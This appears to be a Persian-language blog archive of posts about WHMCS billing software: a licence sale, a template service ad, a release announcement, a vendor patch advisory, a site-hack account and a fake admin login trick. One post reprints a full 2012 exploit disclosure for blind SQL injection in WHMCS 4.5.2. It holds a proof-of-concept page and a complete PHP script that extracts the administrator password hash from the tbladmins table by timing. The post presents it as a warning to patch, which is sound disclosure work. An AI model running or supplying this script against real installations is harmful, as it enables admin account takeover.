loading...
 

شاپ کیپر

شاپ کیپر

دوستان و همکاران گرامی
سلام
یک نسخه whmcs با لایسنس همیشگی و بدون کپی رایت با قیمت 740 هزار تومان به فروش می رسد .
حدودا 6 ماه از تمدید پشتیبانی آن توسط whmcs باقی مانده است که در صورت تمایل میتوانید نسبت به تمدید آن اقدام نمایید .
ارایه کنترل پنل اصلی whmcs + ماژول های ذیل که به طور کامل تنظیم و نصب شده اند :
1- ماژول ثبت فیش بانکی به ارزش 80 هزار تومان
2- ماژول پنل ارسال خودکار sms و خط آن به ارزش 110 هزار تومان
3- ماژول فارسی ساز و تنظیم آن به ارزش 40 هزار تومان
4- ماژول پرداخت آنلاین پارسیان به ارزش 50 هزار تومان

تمامی ماژول ها دارای لایسنس فراسو بوده و در صورت تمایل امکان فروش تمامی موارد به همراه وب سایت نیز وجود دارد که به طور کامل تنظیمات انجام شده و آماده شروع کار می باشد .
هزینه تمامی ماژول ها با احتساب حدود 30 درصد تخفیف + نسخه لایسنس دار : 190 + 740 = 930 هزار تومان
انتقال تمامی موارد با پنل اصلی بعد از خرید صورت می پذیرد .

فروش سایت به صورت HTML و امکان بروز رسانی بسیار آسان و بدون نیاز به دانش فنی + میزبانی رایگان 1 ساله : قیمت 300 هزار تومان مقطوع
آدرس وب سایت : retinahost.com
ایمیل در صورت پیشنهاد و یا سوال : [email protected],com
درباره WHMCS ,
زینب بازدید : 1 سه شنبه 12 آذر 1398 زمان : ۱۳:۱۵ نظرات (0)
با سلام
طی گزارشات دریافتی اخیرا مشکل امنیتی با درجه اهمیت بالا برای نسخه 4.5.x سیستم WHMCS گزارش شده است . لطفا هرچه سریع تر مشکل را از طریق شرکت ارایه دهنده مربوطه برطرف نمایید.

مشکل امنیتی مربوطه در ادامه ارسال شده است.

کد PHP: WHMCS v4.5.2 Blind SQL Injection Vulnerability

[ Home ] [ Description ]
____  _                                    
/ ___|| |_ __ _ _ __  __      ____ _ _ __ ___ 
___ | __/ _` | __|   / / / _` | __/ _ 
___) | || (_| | |      V  V / (_| | | |  __/
|____/ ____,_|_|      _/_/ __,_|_|  ___|
 
 
# Software : WHMCS (WHMCompleteSolution)                                             
# Google Dork: Turn on thinking mode :P
# Date: 10/22/2012
# Author: Starware Security Team [www.Resecure.me]
# Contact Us : Security[@]star-ware.com
# Vendor Homepage: http://www.whmcs.com
# Tested on: WHMCS v4.5.2 
# Affected versions: 4.5.x
-----------------------------------------------------
 
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php
 
#Vulnerable Source Code Snippet : 
 
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents(php://input));
LINE 16: $xmldata = XMLtoArray($xml_response);
LINE 19: $ordernumber = $xmldata[CHARGE-AMOUNT-NOTIFICATION][GOOGLE-ORDER-NUMBER];
LINE 22: $query = SELECT data FROM tblgatewaylog WHERE gateway=Google Checkout AND data LIKE %new-order-notification% . $ordernumber . %;
 
#Proof of Concept : 
 
<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0 %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
var http = new XMLHttpRequest();
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
alert("Permission UniversalBrowserRead denied.");
}
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
http.onreadystatechange = handleResponse;
http.send(params);
function handleResponse() {
 
if(http.readyState == 4 && http.status == 200){
var response = http.responseText;
alert(response);
}
}  
</script>
</body>
</html>
 
#Exploit Code  : 
 
 
<?php
/*
WHMCS Blind SQL Injection Exploit by Starware Security Team.
Usage: php exploit.php URL seconds
*/
 
set_time_limit(0);
function post_request($url,$post_data,$follow=0) {
$user_agent = Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1; 
$ch = curl_init();
$timeout = 1;
$execution_timeout = 4;
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HTTPHEADER,array(Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,Accept-Language: en-us,en;q=0.5,Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7,Keep-Alive: 115,Connection: keep-alive));
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout);                                                     
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post_data);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
 
function start_time() {
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
return $time;
 
}
 
function end_time($start) {
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
$finish = $time;
$totaltime = ($finish - $start);
return round($totaltime);
}
 
 
function check_ascii($num,$num2,$num3) {
global $url,$seconds;
$start= start_time(); 
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0 $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds)  return true;  else return false;
 
}
 
 
function inject($num,$num2,$num3) {
 
global $url,$seconds;
for($i=$num;$i<=$num2;$i++) {
$start= start_time(); 
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0 $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds) { echo  chr($i); flush(); }
 
}
 
 
}
 
function get_password() {
global $url;
for($i=1; $i<=32;$i++) {
if(check_ascii(48,52,$i))  { inject(48,52,$i); }
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); }
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); }
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); }
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); }
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); }
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); }
}
}
 
 
 
if ($argc < 3) {
print "Usage: php ".$argv[0]." URL secondsrnExample:rnphp ".$argv[0]." http://site.com/whmcs/ 1rn-----------------------------------------rn"; 
die; 
}
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php";
$seconds = trim($argv[2]);
echo "[~] Fetching password right now ... n"; flush();
echo "    >> MD5 Password = "; flush();
get_password();
 
?>
 
 
#################################################################################
 
Note: to exploit this vulnerability the google checkout payment gateway 
should be activated by admin from the whmcs admin panel 
 
~ END OF Disclosure ~
 
Good Luck :)
 
#################################################################################
#   Starware is an company specialzed in Hosting and Information Security field #
#   with list of high ranked sites including Mobile operators used our Hosting  #
#                              and Security Services.                           #
#                                                                               #
#                            "Company Located in Egypt"                         #                        
#                                                                               #                         
#                             http://www.star-ware.com                          #      
#                                                                               #
################################################################################# 
 
# 1337day.com [2012-10-23]
اطلاعات تکمیلی :

http://1337day.com/exploit/19615

اطلاعاتی در مورد باگ مربوطه
https://www.owasp.org/index.php/Blind_SQL_Injection
درباره WHMCS ,
زینب بازدید : 2 سه شنبه 05 آذر 1398 زمان : ۱۶:۵۰ نظرات (0)
بنام خدا

با سلام میخوام در این تاپیک خدمات خودم رو عرضه کنم:

1- قالبهایی رایگان که توسط خودمان به سفارش شما دوستان فارسی سازی شده است.
2- قابهایی که توسط ما طراحی و فارسی سازی شده است
3- سفارشاتی در موضوع ست کردن قالبها انجام شده است


امکانات قالب های WHMCS :



طراحی بر اساس جدیدترین متدهای روزطراحی همراه سئو بسیار خوبطراحی و فارسی سازی بدون نقصطراحی و امکان شمسی سازیطراحی و بدون نیاز به 2 نسخه به طورت HTML و...طراحی و استفاده از فونت های زیباپشتیبانی تا 2 ماه پس از خرید


خوب تا الان چند قالب رو طراحی و فارسی سازی کردیم دوستان سفارشات و نظرات خود رو همین جا اعلام فرمایید .


دیدن نمونه های قالب WHMCS


و در آخر عکس های جدیتری قالب ها قرار میگیرد...



امید است که به مناسبتهای گوناگون قالب های رایگان در این تاپیک قرار بگیرد .






با تشکر...
درباره WHMCS ,
زینب بازدید : 9 چهارشنبه 24 مهر 1398 زمان : ۱۲:۱۰ نظرات (0)
WHMCS V5.1 Stable Out Now


We are pleased to announce the stable release of WHMCS V5.1.

This latest update contains over 200 changes, bug fixes & improvements to all aspects of the WHMCS system.

home.png

Highlights include Customisable Order Statuses, New & Improved Reporting Tools, Blend Admin Theme Revamp with Closable Sidebar, New Client Area Domain Addons Management, Improved Calendar Functionality, simplified & more powerful Admin Area Order Process, Global Client Notes, all new Domain Syncing Routine, ability to Retire Products, Ajaxified account look-up tools from Tickets, Customisable Ticket Masks, and much much more...

For a detailed list of changes, please refer to the full changelog @ Version 5.1 Changelog - WHMCS Documentation

The update is available to download immediately from our client area, and instructions for how to upgrade can be found in our documentation at Upgrading - WHMCS Documentation

Or alternatively, as usual we are offering our professional upgrade service where we will handle the entire update process for you @ Upgrade Service - WHMCS

We know its been a while since our last update, and for that we apologise. But please rest assured we will be returning to more regular updates from now on.


خلاصه مطلب : نسخه 5.1 منتشر شده !
درباره WHMCS ,
زینب بازدید : 8 سه شنبه 23 مهر 1398 زمان : ۰۵:۱۰ نظرات (0)
با سلام،
با توجه به اطلاعیه whmcs از همکاران تقاضا می‌شود نسبت به آپدیت نسخه های سیستم خود اقدام کنند.


=================================
whmcs security advisory for 4.5, 5.0, 5.1, 5.2
=================================

whmcs has released new patches for the 4.5, 5.0, 5.1 and 5.2 minor releases. These updates provide targeted changes to address security concerns with the whmcs product. You are highly encouraged to update immediately.

Whmcs has rated these updates as including critical or important security impacts. Information on security ratings is available at security levels - whmcs documentation.

Releases
the following full-release versions of whmcs have been published and address all known vulnerabilities:
5.2.5

the latest public releases of whmcs are available inside our members area at https://www.whmcs.com/members/clientarea.php

security issue information
the targeted security release and patch updates for 4.5, 5.0, and 5.1 resolve an issue of unsanitized information being used in a sql query. Using a crafted url, an attacker could perform an sql injection.

The targeted security release and patch update for 5.2 addresses a security enhancement regression discovered in 5.2.3 and 5.2.4. This regression is not related to the itemized vulnerability mentioned for 4.5, 5.0, and 5.1. The regression was identified internally and is not a candidate for public disclosure.



whmcs version 4.5
download and apply the appropriate patch files to protect against these vulnerabilities.

Patch files for affected version of the 4.x series is located on the whmcs site as itemized below.

V4.5.5 (patch only) - http://www.whmcs.com/download/302/v455patch

to apply the patch, simply download the appropriate patch file specific to the whmcs version you are running, extract the contents, and upload the files from the /whmcs/ folder to your installation.

No install or upgrade process is required.

Whmcs version 5.x
download and apply the appropriate full-version or patch of whmcs to protect against these vulnerabilities.

Patch files for affected version 5.x are located on the whmcs site as itemized below. A full-version of 5.2.5 is located in the whmcs members area download section, under your license details.

V5.0.6 (patch only) - http://www.whmcs.com/download/306/v506patch
v5.1.7 (patch only) - http://www.whmcs.com/download/310/v517patch
v5.2.5 (patch only) - http://www.whmcs.com/download/314/v525patch
v5.2.5 (full-version) - available in the members area

when updating from v5.0.5, v5.1.6, or v5.2.4 you can use the patch file and the upgrade process is not required. Simply download the appropriate file specific to the whmcs version you are running, extract the contents, and upload the files from the /whmcs/ folder to your installation.

If running any other version you should apply the full-version, simply download the file from our members area and then follow the regular upgrade instructions which can be found at upgrading - whmcs documentation

درباره WHMCS ,
زینب بازدید : 7 دوشنبه 22 مهر 1398 زمان : ۰۴:۳۵ نظرات (0)
سلام دوستان الان ساعت 50:20 دقیقه صبحه

داشتم سایت رو آپدیت میکردم . رو سی پنل بودم که یه دفعه متوجه جند تا فایل مشکوک شدم / اولین کاری که کردن خونسردیه خودمو حفظ کردم بعد سریعا اون 2 تا فایل شل رو پاک کردم و فولدر whmcs رو اصلا نگاه نکردم همشون ریختم تو زیپ ، فولدر بازشو هم سریع پاک کردم . سریع رفتم دیدم تو لایو زیلا هم شل ریخته . اون فولدر رو همین کار کردم . برگشتم بیرون روت دیدم اون 3 تا فولدری که تو آموزش پچ امنیتی زده بود اونارو هم دسترسی پیدا کرده . ولی قبل از اینکه کاری کنه سریع جلوشو گرفتم یه اسکرین شات از هک کردنشون میزارم تا ببنید

حالا باز بگید whmcs باگش حل شده . از من میشنوید همین الان بگردید مشکلش رو پیدا کنید از من گفتن بود . شانسی که آوردم من یه دامین دیگه زدم و جدا از این سایته . تمام یوزرنیم و پسورد ها رو از طریق اون ادرس ، ایمیل میکردم تو سیستم whmcs فقط کار حسابداری انجام می دادم و بهتره به عصر قجر برگردیم و از فرم های واریز فیش بانکی استفاده کنیم بهتره تا یه جوجه هکر بیاد این کار هارو انجام بده

اسکرین شات رو پیوست کردم

کد دیفیس رو هم تو یه html براتون گذاشتم که ببنید چه طوری بوده

راستی یادم رفت بگم که من بچ امنیتی رو کامل و بدون نقص نصب کرده بودم . بچه ها حواستون جم باشه . که شب نیان سراغ سایت شما

با صحبت و مذاکره ای که با تیم امنیتی http://www.black-hg.org داشتم . گفتن که این هک کار ما نبوده و هیچ دخالتی ما در این هک نداشتیم . البته قابل ذکر هست که لینک سایت و لینک zone یه اسم این تیم ثبت شده بود . احتمالا یکی می خواسته اسم این گروه رو خراب کنه
درباره WHMCS ,
برچسب ها WHMCS , whmcs , WHMCS 2 , whmcs 5 , whmcs امن , whmcs نال ,
زینب بازدید : 10 چهارشنبه 10 مهر 1398 زمان : ۱۴:۱۰ نظرات (0)
داشتم توی افزونه های این سیستم میگشتم این به چشمم خورد و حیفم اومد اینجا نگم تشکر یادتون نره.

طرز عمل: ابتدا پوشه ادمین رو عوض کنید توضیحاتش همه جا هست
برای پوشه جدید پسورد بذارین
روی پوشه قبلی admin این فایل ها رو جایگزین کنید

در این صورت با هر یوزر نیم پسوردی خطا میده!


Fake admin login page - Trick the hackers


When you move your /admin folder you can use this to replace the folder to trick hackers.

This was made for Arctichost.no, I release it free to the public since I believe security shouldnt be expensive and hard.

All I take as payment is a smile


You are free to copy, edit and share this script!
Please dont sell it though.


{Hacker = anyone who tries to access your admin panel}
درباره WHMCS ,
زینب بازدید : 36 سه شنبه 20 آذر 1397 زمان : ۰۰:۱۵ نظرات (0)
1

تعداد صفحات : 1

موضوعات
لینک دوستان
پیوندهی روزانه
  • آرشیو لینک ها
  • صفحات جداگانه
    آمار سیت
  • کل مطالب : 149
  • کل نظرات : 0
  • افراد آنلین : 10
  • تعداد اعضا : 0
  • بازدید امروز : 881
  • باردید دیروز : 4,101
  • بازدید هفته : 18,175
  • بازدید ماه : 82,777
  • بازدید سال : 831,331
  • بازدید کلی : 1,054,656